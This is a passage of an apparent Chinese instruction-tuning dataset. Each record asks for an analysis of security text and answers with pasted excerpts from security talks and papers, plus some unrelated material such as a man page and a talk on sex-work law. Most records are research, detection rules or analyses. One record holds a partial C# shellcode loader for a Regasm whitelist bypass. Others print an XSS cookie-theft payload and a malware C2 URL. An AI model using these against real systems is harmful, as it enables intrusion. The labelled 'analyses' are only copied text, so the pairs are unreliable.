https://www.vulnerability-lab.com/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAFTER SESTA SEX WORK DEFCON 26 MAGGIE MAYHEM @MsMaggieMayhem 2018 WHEN SEX WORKER RIGHTS ARE UNDER ATTACK, WHAT DO WE DO? GET DRESSED, FIGHT BACK! Sex Worker Rights Labor Chant SEX WORK AFTER SESTA SEX WORK AFTER SESTA ABOUT ME  Sex Worker, Birth Worker, Death Worker  Based in San Francisco, CA  Founder of Harm Redux SF Crack Pipe & Safer Smoking Supplies  Former Sex Worker Outreach Project- USA Board of Directors 2015-2017  Full Spectrum Doula  Former HIV Senior Specialist Larkin Street Youth Services  Feminist Porn Award Winner SESTA/FOSTA STOP ENABLING SEX TRAFFICKERS ACT/ FIGHT ONLINE SEX TRAFFICKING ACT Criminalizes the buying, rather than the selling, of sexual services. The Nordic Model: End Demand The belief that commercial sex and trafficking is underpinned by principles of supply and demand and that without the current demand to pay for sex, there would be no supply of people to exploit. FROM BAD GIRLS, TO SAD GIRLS Moral Failures to Human Trafficking Victims ASYMMETRIC ENFORCEMENT OF A LAW WILL ALWAYS INFRINGE ON THE FUNDAMENTAL RIGHTS OF THE NON-CRIMINAL PARTY First street based buyer sting 1964, Nashville, TN First internet based buyer string 1995, Everett, WA Names and/or photos publicized 1975, Eugene, OR First Dear John letters 1982, Aberdeen, MD Surveillance cameras targeting prostitution 1989, Horry County, SC Neighborhood Action Targeting Johns 1975, Knoxville, TN \"THIS TURNS NEIGHBORS AGAINST NEIGHBORS AND RECRUITS PEOPLE TO BECOME SPIES FOR THE POLICE. ITS NOT HEALTHY FOR THESE COMMUNITIES.\" Cynthia Chandler, human-rights attorney, San Leandro SEX WORK AFTER SESTA SEX WORK AFTER SESTA A National Overview of Prostitution and Sex Trafficking Demand Reduction Efforts, Final Report 2012 While it is necessary and just to assist survivors, and expansion of those services is acutely needed, the interventions are not designed to prevent or reduce the occurrence of exploitation. SEX WORK AFTER SESTA  Most law enforcement response to commercial sex is drive", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1505-003-webshell-冰蝎 ## 来自ATT&CK的描述 Webshell是一个Web脚本放置在可公开访问的Web服务器上允许攻击者将Web服务器用作网络的网关 Web shell可以提供多种功能如虚拟终端文件管理数据库连接等 除了服务器端脚本之外Webshell可能还有一个客户端接口程序用于与管理Web服务器的通信例如中国菜刀C刀蚁剑冰蝎等 ## 测试案例 暂无可自行本地测试 ## 检测日志 HTTP流量 ## 测试复现 暂无建议自行本地测试 ## 测试留痕 暂无建议本地自行测试抓取流量数据 ## 检测规则/思路 ### suricata规则 参考来源<https://github.com/suricata-rules/suricata-rules/tree/master/Behinder> ```yml alert http any any -> any any (msg: \"Behinder3 PHP HTTP Request\"; flow: established, to_server; content:\".php\"; http_uri; pcre:\"/[a-zA-Z0-9+/]{1000,}=/i\"; flowbits:set,behinder3;noalert; classtype:shellcode-detect; sid: 3016017; rev: 1; metadata:created_at 2020_08_17,by al0ne;) alert http any any -> any any (msg: \"Behinder3 PHP HTTP Response\"; flow: established,to_client; content:\"200\"; http_stat_code; flowbits: isset,behinder3; pcre:\"/[a-zA-Z0-9+/]{100,}=/i\"; classtype:shellcode-detect; sid: 3016018; rev: 1; metadata:created_at 2020_08_17,by al0ne;) ``` ### 自定义检测规则 ``` 自定义规则进行防护(uri_path * rco \\.(jsp|jspx|php)$)&&(method * belong POST)&&(request_body * req [\\w+/]{1000,}=?=?$) ``` ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1505-003 <https://attack.mitre.org/techniques/T1505/003/> 冰蝎3.0流量特征分析附特征 <https://mp.weixin.qq.com/s/XMLK5OCpH9pICD9EL9nugA> 冰蝎的前世今生:3.0新版本下的一些防护思考 <https://mp.weixin.qq.com/s/WYM3J3daMTFODr4BSkKzxg>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 19 Malware Freakshow 3: They're pwning er'body out there! Nicholas J. Percoco & Jibran Ilyas Copyright Trustwave 2011 Agenda  Introduction  Evolution of Malware  Sample Analysis + Victim + Demo  Sample SL2010-161  Kameo (Grocery Store)  Sample SL2011-014  Memory Dumper (Bar)  Sample SL2011-026  Webcheck.dll (Work)  Sample SL2011-039  Android Malware (Phone)  Conclusions Copyright Trustwave 2011 Inspiration  System Intruder Well There's malware on the interwebs. They're pwning all your systems, snatching your data up. So hide your cards, hide your docs, and hide your phone, 'cause they're pwning er'body out there!  Zero Cool Copyright Trustwave 2011 Introduction  Who are these guys? Nicholas J. Percoco (@c7five)  Head of SpiderLabs at Trustwave  Started my InfoSec career in the 90s  4th DEF CON talk (2 more this weekend  Droid & SSL)  Primary author of Trustwaves Global Security Report Jibran Ilyas (@jibranilyas)  Senior Forensic Investigator, Spiderlabs at Trustwave  9 Years of InfoSec Experience  Speaker at several Global Security Conferences like Black Hat, DEF CON, SecTor, Source Barcelona, etc.  Masters degree from Northwestern University Copyright Trustwave 2011 Introduction  Why give a Freakshow? Exploits are commodi0es. Malware fuels the business of crime*. *They're pwning er'body out there! Copyright Trustwave 2011 Introduction  Whats this about? This the 3rd Itera0on of this Talk  2009  KeyLogger, MemDumper, Video Poker, Sniffer  2010  MemDumper, Logon Creden=als Stealer, Sniffer, Client-Side (PDF Malware) New Targets This Year -> YOU  Your Grocery Store  Your Favorite Bar  Your Work  Your Smart Phone Copyright Trustwave 2011 Evolution of Malware - 2009  Sloppy malware developers  Just tes=ng the waters  No covert file system placement  Noisy output files  Easily detected using Task Manager Copyright Trustwave 2011 Evolution of Malware - 2010  Started to use tricky names for executable  Located in system folders  Output s=ll mainly in plain-text and wri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"FIRST-TRY\" DNS CACHE POISONING WITH IPV4 AND IPV6 FRAGMENTATION Or how to become the one in one in 34 million WHERE WERE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations  2018 Cisco and/or its affiliates. All rights reserved. Cisco Public $ whoami Travis (Travco) Palmer  Security Research Engineer for Cisco Systems  Offensive Security Certified Professional & Expert (OSCP & OSCE)  Not a DNS/DNSSEC expert Brian Somers  Principal Engineer for Cisco Systems  FreeBSD & OpenBSD developer alumnus YOU DID WHAT? Found a way to poison the cache of DNS resolvers without man-in-the-middle more consistently Modified an IPv4 attack on DNS over UDP, reduced it from hundreds of iterations to plausibly one Extended the attack so that it bypasses all current recommendations YES, WE DID DISCLOSE RESPONSIBLY Our team discovered this attack during a focused pentest engagement Our team disclosed to Cisco Umbrella Umbrella has been disclosing this to other DNS operators (ongoing) before DEF CON. 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations WHERE WERE GOING If the timing on a particular DNS request can be predicted, the reply only needs to be well structured and have a valid ID In 2008 Dan Kaminsky demonstrated 16bits of entropy is not sufficient to prevent cache poisoning And can be performed off-path (source ports are predictable) QUICK AND DIRTY DNS PRIMER D. Kaminsky. Its The End Of The Cache As We Know It. In Black Hat conference, 2008. http://www.doxpara.com/DMK_BO2K8.ppt IDEAL POISONING SCENARIO TARGET PUPPET INTERNET CACHE ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET Resolver is v.x.y.z ! CACHE PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET CACHE PUPPET ATTACKER DNS ID = 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, etc IDEAL POISONING SCENARIO TARGET INTERNET CACHE Not Poisoned? Try, try", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .ig troff.man Last update : 9 Jan 2002 This file is part of groff, the GNU roff type-setting system. Copyright (C) 1989, 2000, 2001, 2002 Free Software Foundation, Inc. written by James Clark modified by Werner Lemberg <wl@gnu.org> Bernd Warken <bwarken@mayn.de> Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation; with the Invariant Sections being this .ig-section and AUTHOR, with no Front-Cover Texts, and with no Back-Cover Texts. A copy of the Free Documentation License is included as a file called FDL in the main directory of the groff source package. .. . . .\\\" -------------------------------------------------------------------- .\\\" Setup .\\\" -------------------------------------------------------------------- . .mso www.tmac . .if n \\{\\ . mso tty-char.tmac . ftr CR R . ftr CI I . ftr CB B .\\} . .if '\\*[.T]'dvi' \\ . ftr CB CW . .de TQ .br .ns .TP \\\\$1 .. . .\\\" Like TP, but if specified indent is more than half .\\\" the current line-length - indent, use the default indent. .de Tp .ie \\\\n(.$=0:((0\\\\$1)*2u>(\\\\n(.lu-\\\\n(.iu)) .TP .el .TP \"\\\\$1\" .. . . .\\\" -------------------------------------------------------------------- .\\\" Title .\\\" -------------------------------------------------------------------- . .TH TROFF 1 \"16 September 2002\" \"Groff Version 1.18.1\" .SH NAME troff \\- groff 文档排版系统的 troff 处理器 . . .\\\" -------------------------------------------------------------------- .SH \"总览 SYNOPSIS\" .\\\" -------------------------------------------------------------------- . .nr a \\n(.j .ad l .nr i \\n(.i .in +\\w'\\fBtroff 'u .ti \\niu .B troff .de OP .ie \\\\n(.$-1 .RI \"[\\ \\fB\\\\$1\\fP\" \"\\\\$2\" \"\\ ]\" .el .RB \"[\\ \" \"\\\\$1\" \"\\ ]\" .. .OP \\-abcivzCERU .OP \\-d cs .OP \\-f fam .OP \\-F dir .OP \\-m name .OP \\-M dir .OP \\-n num .OP \\-o list .OP \\-r cn .OP \\-T name .OP \\-w name .OP \\-W name .RI \"[\\ \" files\\|.\\|.\\|. \"\\ ]\" .br .ad \\na .P 在一个命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\numask === 显示或设置创建文件的权限掩码 ## 概要 ```shell umask [-p] [-S] [mode] ``` ## 主要用途 - 显示当前的文件权限掩码 - 通过八进制数的方式设置创建文件的权限掩码 - 通过符号组合的方式设置创建文件的权限掩码 ## 参数 mode可选八进制数或符号组合 ## 选项 ```shell -p当没有参数时指定该选项执行产生的输出格式可复用为输入 -S以符号组合的方式输出创建文件的权限掩码不使用该选项时以八进制数的形式输出 ``` ## 返回值 返回状态为成功除非给出了非法选项或非法参数 ## 例子 *以下的例子均假设文件权限掩码为0022* ```shell # 以八进制数的形式输出创建文件的权限掩码 umask -p # 执行结果 umask 0022 # 以符号组合的方式输出创建文件的权限掩码 umask -S # 执行结果 u=rwx,g=rx,o=rx ``` > 参考`man chmod`文档的`DESCRIPTION`段落得知 > - `u`符号代表当前用户 > - `g`符号代表和当前用户在同一个组的用户以下简称组用户 > - `o`符号代表其他用户 > - `a`符号代表所有用户 > - `r`符号代表读权限以及八进制数`4` > - `w`符号代表写权限以及八进制数`2` > - `x`符号代表执行权限以及八进制数`1` > - `+`符号代表添加目标用户相应的权限 > - `-`符号代表删除目标用户相应的权限 > - `=`符号代表添加目标用户相应的权限删除未提到的权限 那么刚才以符号形式输出的结果`u=rwx,g=rx,o=rx`转化为八进制数等于`0755` 用八进制数来设置同样的权限`umask`需要额外的执行减法`0777 - 0755`即`0022`而`chmod`不需要 符号组合模式的添加删除赋值权限 ```shell # 添加权限 # 为组用户添加写权限 umask g+w # 删除权限 # 删除其他用户的写执行权限 umask o-wx # 赋值权限 # 赋值全部用户所有权限等价于umask u=rwx,g=rwx,o=rwx umask a=rwx # 清除其他用户的读写执行权限 umask o= ``` 创建文件夹文件假设当前目录不存在 ```shell # 创建文件 touch test.sh # 查看权限发现执行权限的设置不起作用 stat test.sh # 创建文件夹 touch newdir # 查看权限发现执行权限的设置可以起作用 stat newdir ``` ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令 2. `chmod`用于更改已有对象的权限`umask`影响之后新建对象的权限 3. **请谨慎使用该命令**特别是不要取消当前用户的读取权限那样会导致你在终端使用`TAB`键补全时报错", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漏洞原理当开启了分片上传功能时fastadmin 会根据传入的 chunkid 结合硬编码后缀来命名和 保存文件攻击者可预测文件上传路径此后攻击者提交 \"分片合并\" 请求时fastadmin 将会根据传入 的 chunkid 去除了上一步操作中文件名的硬编码后保存新文件导致任意文件上传 前期准备 1. 该接口至少需要普通用户权限我们可以先在前台注册一个用户然后登录 2. 需要修改默认配置 才能使用分片上传功能设置 application/extra/upload.php 下的 chunking 项为 true 3. 可使用 application/index/controller/Ajax 下的 upload() 方法作为入口点根据 tp5 的路 由访问该入口点的 url 为 index.php?s=index/ajax/upload 漏洞分析 该漏洞位于 application/api/controller/Common.php 下的 upload() 方法中 上传分片 根据下文的代码得知我们需要POST传入以下参数才能调用到上传分片文件处第25行 1. chunkid 2. chunkindex 3. chunkcount 4. file public function upload() { $chunkid = $this->request->post(\"chunkid\"); //分片上传 if ($chunkid) { //需要配置 upload.chunking 为 true 才能使用分片上传功能 if (!Config::get('upload.chunking')) { $this->error(__('Chunk file disabled')); } //获取分片上传必要的参数 $action = $this->request->post(\"action\"); $chunkindex = $this->request->post(\"chunkindex/d\"); $chunkcount = $this->request->post(\"chunkcount/d\"); $filename = $this->request->post(\"filename\"); $method = $this->request->method(true); //合并分片文件 if ($action == 'merge') { ...... $upload = new Upload(); //调用合并文件方法 $attachment = $upload->merge($chunkid, $chunkcount, $filename); ...... 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 跟进 chunk() 方法发现 1. Request 的 Content-Type 必须为 application/octet-stream 2. 命名文件时将 chunkid 和 chunkindex 变量用 \"-\" 连接最后硬编码了后缀 .part 3. 最终将文件保存至 /runtime/chunks 下 其中上面的代码 $chunkid 和 $chunkindex 是我们可控的上传路径也是确定的所以我们可以预 测我们上传文件路径 发送请求 ps这里 chunkid 传入的是 xx.php 这个 .php 在后面有奇效 } //!! 上传分片文件 !! else { //获取上传文件 $file = $this->request->file('file'); try { $upload = new Upload($file); //调用上传分片文件方法 $upload->chunk($chunkid, $chunkindex, $chunkcount); } ...... } ...... 23 24 25 26 27 28 29 30 31 32 33 34 35 public function chunk($chunkid, $chunkindex, $chunkcount, $chunkfilesize = null, $chunkfilename = null, $direct = false) { //1. 需要修改 Request 的 Content-Type if ($this->fileInfo['type'] != 'application/octet-stream') { throw new UploadException(__('Uploaded file format is limited')); } $destDir = RUNTIME_PATH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREpsych : psycholigical warfare in reverse engineering { def con 2015 // domas This serves no purpose Warning Taking something apart   to figure out how it works With software Interfacing Documentation Obsolescence Bug fixing Academic Reverse Engineering? Taking something apart   to figure out how it works With software Military/commercial espionage Unauthorized duplication Security analysis Vulnerability analysis Malware analysis Reverse Engineering? Whenever we write something awesome Video game Encryption algorithm Malware 0-Day RAT  someone, at some point, is going to  Capture it Dissect it Reverse it Reverse Engineering? If you dont want your work destroyed   it pays to plan ahead Anti-RE Encryption Obfuscation Anti-debugging Anti-RE objdump d Mintel a.out Reverse Engineering. 4004e9: mov DWORD PTR [rbp-0x8],0x0 4004f2: push 600004 4004f8: call printf 4004fa: pop eax 4004fc: add DWORD PTR [rbp-0x8],0x1 400500: cmp DWORD PTR [rbp-0x8],0x100 400507: jle 4004f2 <main+0xb> mov is Turing-complete Stephen Dolan http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf mov mov destination, source mov Any code we write   can be written as a set of movs instead  and nothing else Really? Thatd be tough to reverse engineer, wouldnt it? Turing Complete? 4004e9: mov DWORD PTR [rbp-0x8],0x0 4004f2: push 600004 4004f8: call printf 4004fa: pop eax 4004fc: add DWORD PTR [rbp-0x8],0x1 400500: cmp DWORD PTR [rbp-0x8],0x100 400507: jle 4004f2 <main+0xb> 80515bc: mov eax,ds:0x835d81a 80515c1: mov ebx,DWORD PTR [eax+0x835d6fc] 80515c7: mov edx,DWORD PTR ds:0x835d7da 80515cd: mov eax,0x0 80515d2: mov al,BYTE PTR [ebx+edx*1] 80515d5: mov al,BYTE PTR [eax+0x835dc7e] 80515db: mov BYTE PTR [ebx+edx*1],al 80515de: mov eax,ds:0x835d81a 80515e3: mov ebx,DWORD PTR [eax+0x835d6fc] 80515e9: mov edx,DWORD PTR ds:0x835d7da 80515ef: mov eax,0x0 80515f4: mov al,BYTE PTR [ebx+edx*1] mov-only C Compiler https://github.com/xoreaxeaxeax First single instruction C compiler! The M/o/Vfuscator factor 20460 prime dec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConnection String Parameter Pollution Attacks Chema Alonso1, Manuel Fernandez1, Alejandro Martín1 and Antonio Guzmán2 1Informatica64, S.L. 2Universidad Rey Juan Carlos 1{chema,mfernandez,amartin}@informatica64.com, 2antonio.guzman@urjc.es Abstract. In 2007 the ranking of the top ten critical vulnerabilities for the security of a system established code injection as the top 2, closely following top 1 XSS attacks. The first release candidate of the 2010 version of the ranking has promoted code injection attacks to top 1. Actually, the most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. The potential damage associated with this kind of threats, the total absence of background and the fact that the solution to mitigate these vulnerabilities must be worked together with programmers, systems administrators and database vendors justifies an in-depth analysis to estimate all the possible ways of implementing this technique. Keywords: Code injection attacks, connection strings, web application authentication delegation. 1 Introduction SQL injections are probably the most known injection attacks to web applications by abusing its database architecture. Many different approaches and techniques have been studied and analyzed so far, and the published results conclude that to prevent these attacks from being successful, development teams need to establish the correct filtering levels on the inputs to the system. In the case of the attack presented in this paper, responsibility lays not only on developers, but also on system administrators and database vendors. This attack affects web applications, but instead of abusing implementation flaws in the way database queries are crafted, which is the most commonly found scenario on other injection attacks, it abuses the way applications connect to the database. According to OWASP [1], in 2007 the ranking of the top ten critical vulnerabilities for the se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDebugging and Reversing ALPC Contents: Introduction & Disclaimer Environment Preparation Getting Off The Ground From User to Kernel Land Hunting An ALPC Object Introduction & Disclaimer This post is an addendum to my journey to discover and verify the internals of ALPC, which Ive documented in Offensive Windows IPC Internals 3: ALPC. While preparing this blog I figured a second post, explaining the debugging steps I took to verify and discover ALPC behaviour, could be useful to all of us that are beginners in the field of reverse engineering and/or debugging. While Ive certainly used the techniques and methods shown in this post below, these where not my only resources and tools to dive into ALPC. Even implying this would undermine the important and major work of other researchers that have documented and reversed ALPC internals in the past, like Alex Ionescu and many others. Hence this disclaimer. TL;DR: The techniques below are practical and useful, but I was only able to apply them due to the work of others. Another important disclaimer is: I am - by no means - an experienced reverse engineer and this blog post is not meant to be an introduction into how to become a reverse engineer or show a smart way to get in this field. This is a use Windows debugging to stumble into a topic and make your way to look around post. Environment Preparation In order to follow the steps shown below you want to set up a kernel debugging environment. If you already have a kernel debugging environment set up, feel free to skip to section Getting Off The Ground. If you dont, youve got two basic choices for this setup: Local live kernel debugging Remote kernel debugging Although the local kernel debugging option only requires a single test machine (virtual VM) and only a single command and a reboot to set you up, I nevertheless recommend starting two machines (VMs) and set up for remote debugging. The reason for this is that local live kernel debugging comes with some constrains and yo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nZidong Han Bridge Attack Double-edged Sword in MobileSec Self Introduction l Mobile Security researcher -Tencent Mobile Security Labs Razor Team l Focuses on App vulnerability and IOT related security l GeekPwn 2018 winner in Hacker Pwn in House l HITB-SECCONF-2018-Beijing Agenda Ø What is Bridge Attack Ø Why a Bridge Attack Ø Bridge Attack and Exploit Cases Ø Defense the Bridge Attack Ø Conclusion What is Bridge Attack Develop Fast Without Risk? What is Abstract Bridge AbstractBridge Mobile0App IoT0Device Browser l Mobile App Ø Android: Javascript in WebView Ø IOS:UIWebView/WKWebView l IoT Device Ø DLNA/Upnp/WebSocket UnOfficaldefinition of Bridge Attack Browser Attack User URL Payload Abstract Bridge Parse Url Send Expolit Result JsBridge IotBridge  Mobile Application Lan IOT Device Why a Bridge Attack WebView Attack in Past l Using addJavascriptInterface to RCE Ø CVE-2012-6336 l WebView Cross-domain Risk Ø setAllowFileAccess Ø setAllowFileAccessFromFileURLs Ø setAllowUniversalAccessFromFileURLs l URL Scheme Attack Ø <scheme>://<host>:<port>/<path>?<query> with exported component Difference in Bridge Attack l More Attack Surface l Vulnerability effect with Bridge Ability l Both Mobile Apps & IoT devicves Bridge Attack and Exploit Cases Bridge Attack Surface in Mobile Application Malicious0 Request Bridge0In0Application&Webview00 Browser Scheme0 Parse Bypass0 Recognize Identification0 Check Fake00 Fun-Call0 Action0 Dispatch Mobile0Device Bypass Identification Check Ø XSS attack from url Ø InSecure domain check(CSRF) Ø JS Bridge(@JavascriptInterface) Man-in-the-Middle Attack Insecure Check Case I str.contains(\"safe.com\")00 str.endsWith(\"safe.com\") 123safe.com0 Expolit JsBridge Ability Ø Custom JsApi better or worse? Ø Easy Web attack can csrf in apps Insecure Check Case II 0000000000 0000000000 http://xxx.com/mobile/middle_page/index.html? url=javascript:alert(document.cookie);//m2.mobike.com What Can we do except stealing cookie?? Insecure Check Case II Payload Que", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napacheurl 0x00 apacheurlnormalizeurldecode 0x01 request.c204271 if (r->parsed_uri.path) { /* Normalize: remove /./ and shrink /../ segments, plus * decode unreserved chars (first time only to avoid * double decoding after ap_unescape_url() below). */ if (!ap_normalize_path(r->parsed_uri.path, normalize_flags | AP_NORMALIZE_DECODE_UNRESERVED)) { ap_log_rerror(APLOG_MARK, APLOG_ERR, 0, r, APLOGNO(10244) \"invalid URI path (%s)\", r->unparsed_uri); return HTTP_BAD_REQUEST; } } /* All file subrequests are a huge pain... they cannot bubble through the * next several steps. Only file subrequests are allowed an empty uri, * otherwise let (pre_)translate_name kill the request. */ if (!file_req) { ap_conf_vector_t *per_dir_config = r->per_dir_config; if ((access_status = walk_location_and_if(r))) { return access_status; } /* Let pre_translate_name hooks work with non-decoded URIs, and * eventually prevent further URI transformations (return DONE). */ access_status = ap_run_pre_translate_name(r); if (ap_is_HTTP_ERROR(access_status)) { return access_status; } /* Throw away pre_trans only merging */ r->per_dir_config = per_dir_config; } /* Ignore URL unescaping for translated URIs already */ if (access_status != DONE && r->parsed_uri.path) { core_dir_config *d = ap_get_core_module_config(r->per_dir_config); /* Unreserved chars were already decoded by ap_normalize_path() */ unsigned int unescape_flags = AP_UNESCAPE_URL_KEEP_UNRESERVED; if (!d->allow_encoded_slashes) { unescape_flags |= AP_UNESCAPE_URL_FORBID_SLASHES; } else if (!d->decode_encoded_slashes) { unescape_flags |= AP_UNESCAPE_URL_KEEP_SLASHES; } access_status = ap_unescape_url_ex(r->parsed_uri.path, unescape_flags); if (access_status) { if (access_status == HTTP_NOT_FOUND) { if (! d->allow_encoded_slashes) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(00026) \"found %%2f (encoded '/') in URI path (%s), \" \"returning 404\", r->unparsed_uri); } } return access_status; } if (d->allow_encoded_slashes && d->decode_encod", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Regasm简介 Regasm 为程序集注册工具读取程序集中的元数据并将所需的项添加到注册表中RegAsm.exe是Microsoft Corporation开发的合法文件进程它与Microsoft.NET Assembly Registration Utility相关联 **说明**Regasm.exe所在路径没有被系统添加PATH环境变量中因此REGASM命令无法识别 具体参考微软官方文档 https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool 基于白名单Regasm.exe配置payload Windows 7 默认位置 ```bash C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe ``` **攻击机**192.168.1.4 Debian **靶机**192.168.1.3 Windows 7 ### 配置攻击机msf ![](media/314cbd2bd9ab4f06f2323a2cd8c0d624.jpg) ### 靶机执行 ```bash C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U Micropoor.dll ``` ![](media/868577dc3b5b517840363527f5b5ad2b.jpg) ### 附录Micropoor.cs **注x86 payload** ```csharp using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms; namespace HYlDKsYF { public class kxKhdVzWQXolmmF : ServicedComponent { public kxKhdVzWQXolmmF() { Console.WriteLine(\"doge\"); } [ComRegisterFunction] public static void RegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } [ComUnregisterFunction] public static void UnRegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } } public class ZApOAKJKY { [DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW); [DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo); [DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo); [DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp); [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIm Not A Doctor But I Play One On Your Network Tim Elrod and Stefan Morris About Us Tim Elrod  Penetration Tester for Fishnet Security Over 7 years pentesting healthcare systems Stefan Morris  Penetration Test for Fishnet Security Over 4 years Pentesting healthcare systems Technology Redux Common Healthcare Technologies Hl7 Dicom A History of Standard Non-standard Standards Why Would You Care? HIPAA Doesnt Help: Theres no PCI for Healthcare Personally Identifiable Information (PII) Protected Health Information (PHI) Identity theft Medical identity theft Loss of Life and Limb PACS What are Picture Archiving and Communication Systems (PACS)? Digital Imaging and Communications in Medicine (DICOM) DICOM the network protocol DICOM the file format Fuzzing DICOM HL7 Interface Systems Health Level 7 (HL7) Protocol and Standards Clear Text Protocol Delimited fields contain either codes or data Sub fields can also contain codes or data Centralized Data Storage and Structure of HL7 Systems HL7 Routers Fuzzing HL7 Electronic Health/Medical Record Systems Medical Record Storage Most medical records are stored in multiple systems across the healthcare environment Health records can exist in databases as well as unstructured data files Front End Interfaces and Issues Common web application issues Logic flaws regarding user permissions Health Information Exchanges (HIE) Building a National Healthcare System and Efficiency Through Legislation Regional and National HIE Structure Vulnerabilities Introduced by the Interconnectivity of Immature Systems Personal Health Records (PHR) Health Vault Google Others Malicious Health Records (MHR) Records input into PHRs such as Google health and Microsoft health vault get parsed and acted upon by backend health systems such as HL7 Routers It is possible for an attacker to inject health records and then cause vulnerabilities to be triggered in backend systems Medical Hardware Review Prescription Dispensing Cabinets Omnicell Q&A Hit us up in the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPLEAD The Phantom of routers Who we are  Charles & Zha0  APT Research @ Team T5  Malware analysis, Cyber Threat Tracking Agenda  IntroducGon  PLEAD began  PLEAD malware analysis  PLEAD lateral movement  GD Rat: Hiding behind PLEAD?  The phantom of routers  Conclusion IntroducGon  PLEAD is a RAT used by an APT group targeGng Taiwan specifically.  developed purely in shellcode  adopGng skillful techniques to obfuscate itself  The actors use several RATs at the same Gme  They have excellent tools for their post exploitaGon job.  Routers were leveraged to hide their footprints Agenda  IntroducGon  PLEAD began  PLEAD malware analysis  PLEAD lateral movement  GD Rat: Hiding behind PLEAD?  The phantom of routers  Conclusion PLEAD began  The 1st public report about PLEAD was released by trendmicro in 2014, it was named PLEAD in that report:  RTLO tricks were used by them to target TW Gov in that report.  The only public report about PLEAD so far. PLEAD began  The oldest sample weve seen could be dated back to 2011:  RTLO was also used then J PLEAD began  We named it PLEAD from its instrucGons: Agenda  IntroducGon  PLEAD began  PLEAD malware analysis  PLEAD lateral movement  GD Rat: Hiding behind PLEAD?  The phantom of routers  Conclusion PLEAD MALWARE FAMILIES PLEAD PLEAD Analysis Process Injection (iexplorer.exe) PLEAD Analysis Config Block Decoder PLEAD Analysis  PLEAD Traffic Pa[ern:  The 1st character of content data would be the command (xor with 0x00)  following immediately with encoded parameter of the command (xor with 1 byte key) (GET|POST)\\s\\/\\d{4}\\/\\w\\d+\\.(js|asp|jpg|css)\\sHTTP/\\d\\.\\d Content Data - Comment CMD: A,C,P,G,E,L,D GET XOR BLOCK (0...0x0D) POST XOR BLOCK (0...0x0B) PLEAD Analysis  PLEAD Traffic Pa[ern: LC:\\ L: cmd_listdir LisGng command of C:\\ and return the result PLEAD MALWARE FAMILIES PLEAD Downloader à PLEAD/RACKEY PLEAD Downloader Analysis  Shellcode (encoded) again!! Two bytes (ASCII) to 1 byte (binray) encoding http://dcns.chickenkiller.com:80/ dyfwm", "category": "text_analysis", "source": "security_papers"}
